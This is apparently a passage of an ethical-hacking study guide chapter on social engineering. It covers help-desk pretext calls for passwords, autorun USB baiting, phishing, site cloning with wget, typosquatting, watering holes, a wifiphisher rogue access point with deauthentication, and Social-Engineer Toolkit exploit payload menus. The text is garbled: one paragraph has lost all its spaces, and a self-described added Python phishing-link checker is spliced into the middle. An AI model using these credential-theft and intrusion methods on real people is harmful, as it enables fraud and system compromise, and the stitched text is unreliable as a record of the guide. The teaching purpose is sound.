It's likely you have been using biometrics for a while at this point. There has been facial recognition on Android smartphones for years. Both Android and iOS devices have supported fingerprints for a while. Apple introduced Face ID a few years ago as an attempt to be better at live facial recognition. One problem with static facial recognition is it could be fooled by static images, so Apple introduced a liveness component, meaning it looks for nonstatic indicators in the face to be certain it's not just a photo it's looking at. Android also supports identification using your eyes. Biometrics is the use of a physical characteristic that is unique to you as a form of authentication. If you have used any of these methods to unlock your phone, you have been using biometrics. This is a form of physical access control that may simply be impossible to get by. These are some of the types of biometrics you may run across.

Fingerprints
Fingerprint scanners are common, in part because the technology for them has been around for a while. There are some issues with fingerprints, including the fact that the reader could be fooled by a high-resolution replica of the print, unless the reader takes into account body temperature. Body temperature isn't always a reliable indicator since it isn't guaranteed to be consistent (ever run across someone with really cold hands?).

Iris Scanning
Iris scanning is a more recent version of eye scanning. The iris is the part of the eye that contains the color. It also changes size based on how much your pupil has to dilate because of the amount of light. If you look very closely at your eye or, perhaps better, someone else's eye, you will see that the iris isn't a solid color. There is a pattern to it. It's this pattern that gets matched to authenticate you. The iris pattern is considered unique for each person. One advantage of iris scanning is that light is used to illuminate the eye, so iris scanning could work in the dark.

Retinal Scanning
This is also based on your eye. The retina is at the very back of your eye and contains the light-sensitive cells that create impulses for your optic nerve. The retina contains a pattern from blood vessels, which can be used to identify a person.

Voiceprint
Voiceprint was famously demonstrated in the movie Sneakers. Find it if you haven't seen it. It includes lots of ideas for social engineering and a very weird way to break a voiceprint reader. There are many problems with voiceprint readers. One of them is that your voice will change from day to day based on a number of factors, including simply time of day. Also, colds will affect your voice. This is one reason there aren't a lot of systems that will use voiceprint, at least for the implementation of a security system.

The efficacy of biometric systems is based on success and failure rates. There are two measures that are particularly important. The first is a false negative. A false negative means someone who should be allowed access is being denied. This is not nearly as bad as a false positive, however. A false negative may require either another attempt or, at worst, the intervention of someone else. A false positive means someone who shouldn't be allowed to have access gets access. With a false positive, you get unauthorized people roaming your facility. The two measures commonly used are false failure rates (FFRs) and false acceptance rates (FARs).

There are other types of biometrics, including palm-print scanners as well as hand topography. There are reasons you aren't as likely to run across these types of biometrics. They are not completely reliable. There may be ways to bypass the different types of biometrics, but it may simply be easier to not even get into a situation where the biometrics scans come into play.

Phone Calls
This isn't exactly physical in the way that gaining access to a facility is, but it still can be a lucrative way to collect information. If it weren't, you wouldn't be getting phone calls from "Windows Support" claiming to have received notice from your system. This is another case where pretexting can help a lot. It's also useful to have done a lot of reconnaissance ahead of time so you know more than just the main phone number. If there are multiple facilities, getting phone numbers for them will be useful as well. This is especially useful in a common pretexting strategy. Attackers can just start randomly calling phone numbers or extensions within an organization, saying they are from the help desk or IT support. Eventually, they will stumble across someone who is waiting for a callback from support. The user will be grateful for the callback, which returns us to the principles noted earlier. First, there is reciprocity. They will be grateful for the help. Once people get to the point of contacting the help desk, they are likely stymied and frustrated. This is especially true of unsophisticated users, who are probably more prone to needing help desk support and may potentially be challenged performing the actions needed, even when guided. This could make them especially grateful for a callback, most particularly if you are able to make their problem go away.

The second principle in this case is that of authority. As part of the help desk team, you have permissions and knowledge they don't have. This means you have some authority. As noted, people are likely to follow the directions of those who have authority. If you were to suggest you needed a username and password to authenticate them, they may be willing to give that information up.

Companies regularly put employees through training, typically annually, to help them recognize social engineering scams. This can potentially make the job harder, though not impossible. It helps to have a plausible story. It helps even more if you have details about the company that you can feed people on the inside to make it seem more like you really do work for the company, making you more trustworthy.

Baiting
People love free things. If you've ever been to an IT-related conference or convention, you may have noticed the long lines of people waiting to grab whatever companies are giving away, regardless of whether they need it or not, or whether it's useful. After all, how many stress toys can you possibly have? Why is this relevant? You can take advantage of this. It used to be you could leave CDs around to see if people would pick them up. Hand-label them with something interesting, maybe even the name of a big hit album. Otherwise, you could give it the name of some tantalizing set of data. Anything that would encourage someone to grab the disc and put it into their computer to see what was really on it. Of course, often computers today don't have CD-ROM drives in them, so leaving CDs around doesn't do a lot of good.

This doesn't mean you can't still make use of the fact that people love free stuff. If you were to see a 128 GB USB stick sitting in the parking lot, for instance, what would you do? Even something smaller, what would you do? A fairly substantial number would look around to see if there was anyone nearby who might have dropped it, and then they would pick it up. A lot of people will insert the stick into their computer to either see what's on it or format it so they can use it themselves. Free stuff, after all. Who couldn't use a 128 GB USB stick for transporting data or backing up data?

Of course, not just any USB stick will do, certainly not a blank USB stick. What you need to do is insert some software on the stick that will do something useful for you. This may include providing you with remote access to the user's system. You can't rely on users to just run the software you have left on the stick, though. You can, though, make use of the autorun.inf file to have your program run automatically if the stick is inserted into a computer that has autorun enabled. Not all computers will have that, of course. It's a common hardening technique to prevent any removable disk from automatically running anything. This is another area where users are commonly trained. Again, though, you may be able to get people to ignore their training if you make the bait you have left behind especially tantalizing in some way. These days, really large USB sticks don't cost a lot of money, so it may be a good investment to get some that you can leave around.

Phishing Attacks
You're likely familiar with these attacks. You've probably seen them a lot if you are a security professional or even if you are just someone who has been using a computer for a few years. If you don't feel like you've seen a phishing attack, open your Junk folder in your email program. There is a good chance you will find dozens of them. At the least, you should be able to find one there. If you don't have one and feel like you are missing out, you can have one of mine. You can see an example of a phishing email in Figure 10.3.

FIGURE 10.3 Phishing email

There are many characteristics of this email that are suspicious. The first is an email telling me I've won a large amount of money. All I have to do to get the money is provide my personal information. An offer of free money immediately makes me suspicious. Asking me for personal details for winning a lottery I didn't enter also makes me suspicious. After all, if I was selected, why don't they already have my information? Another one that raises a huge flag for me is the suggestion that I should contact a barrister in the United States. The United States has lawyers, not barristers. A company who had a lawyer in the United States would know that. The grammar is also a hint. If you see suspicious grammar, you should be suspicious of the email.

Just asking for contact information is fairly low grade for a phishing attack. It seems unlikely to be particularly successful. However, 419 scams still do succeed, so they continue, in many forms. There is a theory that people who are likely to fall for such a poorly constructed scam self-select. If they are likely to believe the scam, they are probably likely to give up money to attackers.

Better phishing emails are those that are constructed to look completely legitimate, as long as you aren't looking too closely. These sorts of attacks are more likely to succeed, and they aren't especially difficult to put together. You can see an example of this sort of phishing email in Figure 10.4. This is an email constructed to look like a warning from Wells Fargo. If I were to do business with Wells Fargo, this would be an email that I'd look at very closely. There are elements that are convincing. The graphics are exactly the sorts of graphics I'd expect to see in an email from Wells Fargo. It's even worded reliably. We tick at least one box with this message. First, we get authority. It says it's Wells Fargo. Second, there is reciprocity. We'll feel grateful that we were warned about a potential compromise of our banking account.

Looking at the message more closely, though, it becomes more suspicious. Hovering over the link in the message turns up a URL that has nothing to do with Wells Fargo. Also, the email address in the sender field is bogus. It doesn't even look like an email address. Interestingly, there is a second link in the message where the URL is seen only if you hover over the link. It also has nothing to do with Wells Fargo, but strangely, it is also different from the URL that you can see. Odds are, if the URLs even work, they will lead to a site that either asks for authentication information or supplies malware to the system. It could be both. Why not gather banking information at the same time you install a remote access program?

Phishing is useful as a strategy. It's lucrative, as you can tell by the number of email messages you may have in your Junk email folder. Again, if you don't have a lot of them, you can take my word for it. My email address has been around long enough and is just well known enough (not because of me but because of what the address itself is) that I likely have more than enough in just the last month for both of us. If you are targeting people who work for a particular company, you have moved beyond phishing and gone to spear phishing, which means you aren't using a shotgun approach trying to hit as many targets across a broad area as you can. You are using a spear to get your target.

Phishing email messages may include attachments. These messages may show up in many forms. A common approach I have seen in the past is to send an attachment disguised as an invoice. You are directed to open the invoice so you can pay the bill. Figure 10.5 shows something along these lines, purportedly from Apple. Often these attachments are PDF documents. In the email in Figure 10.5, it's likely the attachment was a PDF but the attachment was stripped out by anti-malware software on the server side. Implementations of PDF, and, to a degree, the format itself, have a history of vulnerabilities. There is a good chance that a reader that the target may be using can be exploited. It's also a lot easier to get people to open a PDF than a plain executable. Users are well aware of the dangers of opening programs. They may be more likely to think that PDFs can't hurt them, when in fact they can. The PDF format itself has the ability to execute an embedded executable.

FIGURE 10.4 Wells Fargo phishing email

Phishing attacks are an important part of a penetration test or red team engagement. It can be useful to have a tool such as FiercePhish that will help manage your engagements. FiercePhish provides a web interface to manage all of your social engineering campaigns. Using the web interface, you can manage your target lists as well as all the templates you want to use. You may be able to create templates that you can reuse with different targets. After all, some of the most effective social engineering attacks are likely to be those that have some benefit for the victim. Think about emails that may be offering the target something. This may use natural greed against the victim. You could use lottery winnings or some sort of refund.

FIGURE 10.5
PhishingemailwithattachmentWebsiteAttacksEvenifyouweretouseaphishingattack,youmayverywellneedasecondelement.Youcouldincludemalwareinyourphishingattack,whichcouldgetyouaccesstothetargetsystem.Thatmaybemorecomplicatedthanyouwantbecauseitwouldrelyoneithertheuseropeninganattachmentortheattachmenttakingadvantageofavulnerabilityinthesystem.Itcanbeeasiertogetuserstoclicklinksthanitcanbetogetthemtoopenattachments.Thisisespeciallytrueiftheemaillookslegitimateandthelinklookslegitimate.Thismeans,though,thatyouneedawebsitesomewheretowhichtheuserscanconnect.Ifyouarephishingasyourentrypoint,youmaystartwithasiteclone,whichwouldlooklikealegitimatesitesowhentheuserconnects,theydon’tsuspectanything.TherearelotsofwaystogetaURLtolooklikeitmaybelegitimate.Youcouldregisterahostnamelikewww.microsoft.com.rogue.com,whichmayletpeoplethinktheyareconnectingtoMicrosoft’ssitewheninfacttheyareconnectingtothehostidentifiedbythehostnameinthedomainrogue.com.Usersdon’talwaysseetheentirehostnameorURLandprobablydon’tunderstandenoughaboutthestructureoffullyqualifieddomainnames(FQDNs)tounderstandwhattheyarelookingat.WebsiteAttacks 
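The FQDN point just made, together with the link and sender checks from the Wells Fargo example earlier in this section, as an added example that is not code from the study guide: a small Python triage script that reduces each hostname to its registrable domain (so www.microsoft.com.rogue.com is reported as rogue.com), flags a trusted brand name appearing as a label inside some other registrable domain or as a one-character typo of it (the gogle.com case the Rogue Attacks section discusses), and compares the visible text of each link with the host its href actually points to. The trusted-domain list, the sample headers and the HTML body are constructed for this example, and the two-label suffix table is a deliberately minimal stand-in for a full public suffix list.

```python
"""Phishing-link triage (added example with constructed data; not the study guide's code)."""
import re
from html.parser import HTMLParser

# Constructed allowlist: registrable domains the recipient legitimately deals with.
TRUSTED_DOMAINS = ("wellsfargo.com", "microsoft.com", "google.com")

# Minimal stand-in for the public suffix list: suffixes that span two labels.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}

EMAIL_RE = re.compile(r"^[^@\s<>]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})$")
URLISH_RE = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:[/?#]\S*)?$", re.I)
HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:?#\s]+)", re.I)


def registrable_domain(host):
    """Reduce a hostname to the part a registrar actually hands out.

    Everything left of that is chosen by whoever owns it, which is why
    www.microsoft.com.rogue.com is really just a host inside rogue.com.
    """
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def within_one_edit(a, b):
    """True if one deletion, insertion, substitution or adjacent swap turns a into b."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        diff = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
        if len(diff) == 1:
            return True
        return (len(diff) == 2 and diff[1] == diff[0] + 1
                and a[diff[0]] == b[diff[1]] and a[diff[1]] == b[diff[0]])
    short, long_ = sorted((a, b), key=len)
    return any(long_[:i] + long_[i + 1:] == short for i in range(len(long_)))


def lookalike_of(host):
    """Return the trusted domain this host imitates, or None if trusted or unrelated."""
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return None
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        for label in host.lower().split("."):
            # Brand reused as a label elsewhere (microsoft.com.rogue.com,
            # wellsfargo-alerts.net) or a one-character typo of it (gogle.com).
            if brand in label or within_one_edit(brand, label):
                return trusted
    return None


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    m = HOST_RE.match(url.strip())
    return m.group(1).lower() if m else ""


def triage(headers, html):
    """Return a list of human-readable findings for one message."""
    findings = []
    sender = headers.get("From", "")
    m = re.search(r"<([^>]+)>", sender)
    addr = m.group(1) if m else sender.strip()
    em = EMAIL_RE.match(addr)
    if not em:
        findings.append(f"sender is not a valid address: {sender!r}")
    else:
        imitated = lookalike_of(em.group(1))
        if imitated:
            findings.append(f"sender domain {em.group(1)} imitates {imitated}")
    parser = AnchorCollector()
    parser.feed(html)
    for href, text in parser.anchors:
        host = host_of(href)
        if not host:
            continue
        imitated = lookalike_of(host)
        if imitated:
            findings.append(f"link to {host} imitates {imitated}")
        # Visible text that is itself a URL but lands in a different registrable domain.
        if URLISH_RE.match(text) and registrable_domain(host_of(text)) != registrable_domain(host):
            findings.append(f"visible link {text} actually points to {host}")
    return findings


# Constructed sample message modelled on the Wells Fargo example in the text.
SAMPLE_HEADERS = {"From": "Wells Fargo Alerts <security@wellsfargo-alerts.net>"}
SAMPLE_HTML = """
<p>Unusual activity was detected on your account.</p>
<a href="http://www.wellsfargo.com.rogue.example/verify">https://www.wellsfargo.com/security</a>
<a href="http://gogle.com/login">Sign in with Google</a>
<a href="https://www.wellsfargo.com/help">Help Center</a>
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_HEADERS, SAMPLE_HTML):
        print(finding)
```

Run as-is, it reports four findings for the constructed message: the sender domain and the first link both reuse the Wells Fargo brand under a different registrable domain, the first link's visible URL does not match where it points, and gogle.com is one edit away from google.com. The suffix table is the main simplification; a real deployment would consult the full public suffix list so that hosts under suffixes like co.uk are reduced correctly.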
This isn't the only type of attack you might use when it comes to social engineering. Phishing isn't the only entrance vector. You can also take advantage of the way people commonly browse. With this approach, you can just allow people to come to your site without trying to encourage them. You may still need to use the site cloning technique, however. Ultimately, you don't want to arouse suspicions, so you are better off doing as much as you can to make something appear legitimate. It will give you more time to either gather information or get your payload to your target.

Cloning

Site cloning is an incredibly easy thing to do. In fact, you don't even need to clone the entire site. You just need the HTML code that makes rendering the page possible. Leaving any media files in their original locations is fine because you can take advantage of any updates to them if, for some reason, they change. It will lend more credibility to your cloned site actually. If anyone were paying attention, they would see the requests going to the legitimate sites rather than your rogue site. The only file that would be coming from your rogue site is the HTML that controls the rendering of the page. This is not to say that you couldn't grab the files and host them locally. With a tool like WinHTTrack, it's a configurable option, as you can see in Figure 10.6.

FIGURE 10.6 WinHTTrack options

The options are optional, of course. By default, WinHTTrack won't grab media files but will only grab the HTML from a site. It will clone the entire site, though, which means it traverses links. WinHTTrack uses projects to clone sites, so it's a multistep process to pull a website. In Figure 10.7, you can see the step in which you would enter the URL. You could also enter multiple URLs if you wanted to download multiple sites. You would have to change the action to Download All Sites In Pages. You could also use WinHTTrack to test sites rather than downloading them, which means you could check a list of bookmarks to see if they were still valid.

If you prefer command-line tools, though, there are a couple you could use. One of them is wget, which is a program that is used to make web-based requests and get files. You could use wget to download files from the command line. On a Linux system, you could grab tarballs of source code, package files, or any file that wouldn't need to be rendered. You can use wget to do recursive GET requests to a web server, which is what you would need to mirror a site. This means wget pulls the HTML page at the top of the site and saves it. It then looks for all the anchor tags in the page and follows each of them in turn to get those pages or files. In the following code listing, you can see a run of wget using -m to tell wget to mirror the site, meaning grab the entire site.

FIGURE 10.7 Site cloning with WinHTTrack

Using wget to Mirror Website

[email protected]:~# wget -m https://www.wiley.com
--2021-01-23 07:05:43--  https://www.wiley.com/
Resolving www.wiley.com (www.wiley.com)... 143.204.29.19, 143.204.29.108, 143.204.29.24, ...
Connecting to www.wiley.com (www.wiley.com)|143.204.29.19|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: /en-us [following]
--2021-01-23 07:05:43--  https://www.wiley.com/en-us
Reusing existing connection to www.wiley.com:443.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: 'www.wiley.com/index.html'

www.wiley.com/index     [    ]  85.83K  --.-KB/s    in 0.08s

Last-modified header missing -- time-stamps turned off.
2021-01-23 07:05:44 (1.08 MB/s) - 'www.wiley.com/index.html' saved [87888]

Loading robots.txt; please ignore errors.
--2021-01-23 07:05:44--  https://www.wiley.com/robots.txt
Reusing existing connection to www.wiley.com:443.
HTTP request sent, awaiting response... 200 OK
Length: 817 [text/plain]
Saving to: 'www.wiley.com/robots.txt'

www.wiley.com/robot 100%[===================>]     817  --.-KB/s    in 0s

If you wanted to have access to the site offline, you could use command-line switches to make the links relative. For our purposes, though, we would want to have the site available through our own web server, so we're just going to mirror the site, keeping everything the way it is. Another command-line program that's similar to wget is cURL. Unfortunately, cURL doesn't have built-in functionality to pull a complete website, in spite of everything cURL is capable of. You could, though, write a short script that would pull the site, and there are such scripts available online for people who prefer to use cURL over wget.

Once you have the pages for the site in place, you would need to make any adjustments to the source code. This would include inserting your malicious code so it could be downloaded and then including a reference to it in one of the pages in the site. Once you have the site, you could send the URL for a page to a target, potentially in an email. When it comes to social engineering, you will sometimes find multiple layers in the attack.

Rogue Attacks

A rogue website would be one that a user may expect to be legitimate when in fact it has a malicious purpose. This could be a site that looks exactly like a legitimate site, using the site-cloning technique mentioned earlier, but the URL, meaning the fully qualified domain name, is different than the usual URL. There are some hostnames that are commonly mistyped. Attackers can register these common typos as domain names themselves and wait for people to come visit. The tactic is called typosquatting. You could, for instance, register gogle.com and do a site clone of google.com, serving up pages at a server that hosts your gogle.com site. You may also hear this tactic referred to as URL hijacking.

Rogue doesn't necessarily mean you've created a fake site, though. It could mean that you are using a legitimate platform to stage your attack without the legitimate platform knowing anything. A watering hole attack is a social engineering attack that makes use of the fact that there are sites that people will commonly visit. A watering hole in the wild is a place where animals come to visit a lot and maybe even hang around. It's a place animals are guaranteed to come; because water is so essential to life and not all animals get all the water they need from their food, the watering hole is a great place to wait for animals to visit. The same is true with this sort of attack. With a watering hole attack, you would gain access to a website that a lot of people visit and introduce infected software to it. This is not to say this is an easy attack to execute, but by using it you have the potential to gain a lot of systems quickly. Rather than just gaining access to a single system, if you compromise a website that's visited a lot by the people you are looking to get information out of, you can gain access to a lot of systems by compromising a single system. Once you get over the hurdle of compromising the website—for example, if you were to compromise espn.com, you would get a lot of men in particular stopping by on a regular basis—introducing the attack is easy. As an example, in the following code listing you can see a couple of lines introduced at the bottom of an index.html page.

Attack HTML with Applet Reference

This does require that you have an applet that you can use, though they can be either found or created. As with so many other things, Metasploit can be used for attack payloads like this. This HTML fragment tells the browser to load the Java class found in the Java archive (JAR) hkFKIKkhSvSHss.jar. This is a randomly generated filename. Included in this attack is a reverse connection back to an IP address that was loaded into the attack.

Watering hole attacks are not the only web-based attacks you'll see, but they have the advantage of being targeted. They are probably more useful when working with an organization. You could load up an attack into the intranet server, if the company has one, since it's the sort of site employees will regularly visit, and you could potentially gather a lot of desktop systems from the compromised host.

Wireless Social Engineering

Wi-Fi networks have become ubiquitous, and with so many devices not even having the capability of supporting a wired connection, there is generally an expectation that there would be a Wi-Fi network available for people. This is something else you can take advantage of. You can find a long list of Wi-Fi networks in most places. Just sitting in my living room, in a small community, there is a list of almost two dozen Wi-Fi networks available. You can see the list in Figure
10.8. There are no restrictions in naming these networks. There is no central place to register the names. You can even have overlapping names within the same physical space. It becomes up to the client trying to connect to determine what network to actually connect with.

FIGURE 10.8 List of Wi-Fi networks

You can take advantage of this lack of any way to know what network to use, since even if you check the base service set identifier (BSSID), you can't tell anything from it. It just appears to be a MAC address. You can easily create a rogue Wi-Fi network, which provides a lot of interesting possibilities, especially when it comes to gathering usernames and passwords.

Wireless networks were initially thought to be inferior to physical networks because it was so easy to gather the signals out of the air. This is definitely true. We have no ability to restrict who can receive the wireless signals once they have been transmitted. As a way to protect the transmissions from capture, there have been multiple attempts at encrypting the transmissions. The first was Wired Equivalent Privacy (WEP). This mechanism had several problems, leading to WEP transmissions being easily decrypted. The follow-on to that was Wi-Fi Protected Access (WPA), which attempted to correct some of the issues with WEP. WPA didn't wholly succeed, so it was followed with WPA2. WEP used a pre-shared key (PSK) to provide a way to authenticate users. WPA introduced enterprise authentication. This means WPA and WPA2 could accept usernames and passwords for authentication before being allowed to connect to the network. This is not the only way to authenticate users, of course, but it is one of them. Generally, a username and password used in a wireless network at a company would be the same username and password used to authenticate against the network servers, since those servers, for instance Active Directory servers, generally handle authentication for the enterprise.

In some cases, you would just connect to a Wi-Fi network, and it would bring up something called a captive portal. A captive portal is basically a limited-functionality web page that often provides edit boxes for authentication credentials. You will find these sorts of things in hotels and sometimes airports. At a hotel, you may be expected to log in with loyalty credentials, or you may have to provide your last name and room number as a way to prove you are really a hotel customer. This is another place where you can gather credentials from users. Either way, users are expected to authenticate, and you can easily do some reconnaissance by getting close enough to the building to get the network signal and then try to connect to the network to see how it behaves on a connection attempt.

You can configure a method to grab passwords from users. This setup does take some skill and effort. Kali Linux will have all the tools you need, including hostapd and iptables. The program hostapd turns your wireless interface into an access point, and iptables is used to route traffic from your wireless interface through another interface to the Internet. You could then use other programs to capture traffic to get the authentication credentials.

Another approach would be to use wifiphisher. This is a program that will do a lot of the work for you, including creating a scenario that would allow you to install software onto the target system. The documentation online is out-of-date. Rather than passing everything in on the command line, it's just as easy to run it without any command-line parameters and then make your selections as the program walks you through your choices. Starting it up, you can see it sets up a pair of wireless interfaces; then it starts up a Dynamic Host Configuration Protocol (DHCP) server and iptables, both of which would be needed to make it seem as though users had legitimately connected to an access point.

Starting Wifiphisher

[email protected]:~$ sudo wifiphisher
[*] Starting Wifiphisher 1.4GIT (https://wifiphisher.org) at 2021-01-25 01:21
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan0 interface for creating the rogue Access Point
[+] Changing wlan0 MAC addr (BSSID) to 00:00:00:9e:e7:b5
[+] Sending SIGKILL to wpa_supplicant
[+] Changing wlan0 MAC addr (BSSID) to 00:00:00:3e:48:01
[+] Changing wlan1 MAC addr to 00:00:00:cc:3f:74
[*] Cleared leases, started DHCP, set up iptables

Once you start wifiphisher, it brings up all the SSIDs that are in range of your system. This is where you would select the SSID you wanted to spoof to gather credentials. You can see this selection in Figure 10.9. As it says on the screen, you arrow down to select the SSID you want to spoof and then press Enter to select it. You may have noticed in the preceding output that one of the wireless interfaces was going to be used for the deauthentication attack. This means that as wifiphisher runs, it will send deauthentication frames to systems that appear to be connected to the real access point. This would force those clients to reauthenticate, ideally authenticating with you.

FIGURE 10.9 wifiphisher SSID selection

Once you have selected the SSID you plan to spoof, wifiphisher will ask you to select the type of attack to use. In Figure 10.10, you can see the choices for what scenario users will be presented with. The template selected will determine what you get from your target. The OAuth page will allow you to gather credentials, while other templates, including the browser plug-in, will allow you to get some code onto the target computer. This could be remote access software, for instance. As with so many other things, it comes down to what you are trying to accomplish with this type of attack.

FIGURE 10.10 wifiphisher attack template selection

When it comes to wireless, there are so many moving pieces needed to make it work effectively, meaning the whole setup would work in a way that it wouldn't cause much suspicion on the part of the user, which may prevent them from getting a security team involved to identify your rogue access point. It is definitely better to use automated tools to do your wireless social engineering attacks. This is not to say, though, that you need to always use manual methods for other social engineering attacks. There are other ways to automate social engineering.

Automating Social Engineering

Since phishing is one of the easiest and most predominant attacks seen in the wild, we can start with automating phishing attacks. We're going to turn to Metasploit to help us with this, but more specifically, we'll use a program that is an overlay on top of Metasploit called the Social-Engineer Toolkit (SET). This is a menu-based program that uses modules and functionality from Metasploit but pulls it all together automatically for you to accomplish tasks necessary for social engineering attacks. In the following code listing, you can see the initial menu for SET. This is a program that has a lot of capability, but we're going to limit our look at it rather than doing a deep dive into everything it can do.

Starting Menu in Social-Engineer Toolkit

The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
   Visit https://github.com/trustedsec/ptf to update all your tools!
 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

 set>

Selecting Social-Engineering Attacks opens another menu, and to be clear, these are text-based menus where you enter the number of the menu item. The entire program has seen growth in what it can do over the years. This is certainly true in the number of vectors available in the Social-Engineering Attacks menu, which you can see in the following listing. You may notice that there are two phishing attack vectors. One is for mass mailing, while the other is for spear phishing. The difference is the number of targets you are expecting to mail.

Social-Engineer Toolkit Social Engineering Attacks

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

No matter which one you pick, you will be able to send to either a single address or multiple addresses. The differences between the two options are shown in the following code listings.

Spear-phishing vector

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

Mass Mailer Vector

   1. E-Mail Attack Single Email Address
   2. E-Mail Attack Mass Mailer

We're going to take a look at the Mass Email Attack vector because the essentials will be the same across the different email attacks. The Mass Email Attack lets us use a file format exploit. The payloads available are ones that are in Metasploit. In the following code, you will see the payloads that are available to you. These payloads are file formats that are commonly exploited and may have a good chance of success.

Payloads for File Format Exploit

 ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

The file format tells us how we are going to exploit the system. This will let us run arbitrary code on the remote system; we just need to determine what that arbitrary code is going to be. Our payload is going to be based on the type of file format exploit we are going to use. If we select the first file format type in the list, we get a list of payloads where the default is a Meterpreter memory injection. This payload provides a Meterpreter shell being sent back to us, as long as we have a handler set up.

Phishing can be a reliable attack vector when it comes to social engineering, but it's not the only one. You may not even be looking to get shell access to the target system. Fortunately, the SET has a lot of other capabilities, as you could see in the initial menu. You could even automate wireless attacks using SET. While there are plenty of other ways to perform social engineering attacks, this is a powerful tool that leverages the payloads and other functionality of the Metasploit Framework to make your life a lot easier.

Summary

Social engineering is a skill that has been around for probably as long as there have been humans who have wants and desires. Once you know the principles of social engineering, you can start to recognize places where you are being manipulated. The principles of social engineering are reciprocity, commitment, social proof, authority, liking, and scarcity. These key principles can be used to manipulate people into performing acts they may not otherwise be inclined to perform. This can include giving you access to systems or information. It could also be giving up credentials that you may need to perform other attacks.

When you are preparing a social engineering attack, pretexting is important. Pretexting is creating the story you are going to be telling. You can see examples of pretexting in your email and even in scam phone calls. The 419 scam is common and a good example of pretexting. You are being told a story, and it's a story you are inclined to buy into, likely because of the promise of millions of dollars. Who, after all, wouldn't like to have enough money that they could quit their job and go live on a beach in Tahiti? Pretexting is just the story you are going to tell your targets. A good pretext has all the angles covered so you aren't fumbling for an answer when your target asks a question or raises an objection. You have it all figured out. This can require research, especially if you are going after employees within an organization who may have been given training to protect themselves and the company against social engineering attacks.

There are many forms social engineering can take. Four of these are vishing, phishing, smishing, and impersonation. Vishing is trying to gather information over the phone; phishing is the process of gathering information through fraud, though commonly it's thought to include email as the delivery means; smishing is using text messages; and impersonation is pretending to be someone else. While some of the forms of social engineering will include impersonation as a component, when we talk about impersonation as a social engineering vector, we're talking about impersonating someone else in order to gain physical access to a building or facility.
Gaining physical access to a facility may be an important element in a penetration test or red-team effort. You can impersonate someone else, but there are multiple protections that may make that difficult. Many buildings today are protected by requiring a badge swipe to demonstrate that you are who you say you are and that you have legitimate access to the building. This can be avoided through the use of tailgating. Tailgating means following someone else through the door after they have opened it with their badge. A mantrap can protect against this sort of entrance, as can a revolving door that only makes a quarter turn for a swiped badge. Biometrics can also be used to verify identity. Once identity has been demonstrated, access can be granted as defined.

Websites can be used as vectors for social engineering attacks. This is another area where impersonation can be useful. It's trivial to set up a clone of an existing website by just copying all of the resources from that site to another location. Once there, you can add additional components, including "malicious" software, which may give you remote access to the target system. You can use typosquatting attacks, using a domain name that is similar to a real domain name with a common typo as part of the name. You can also use watering hole attacks, which is where a commonly visited site is compromised so when users come to the site, they may get infected.

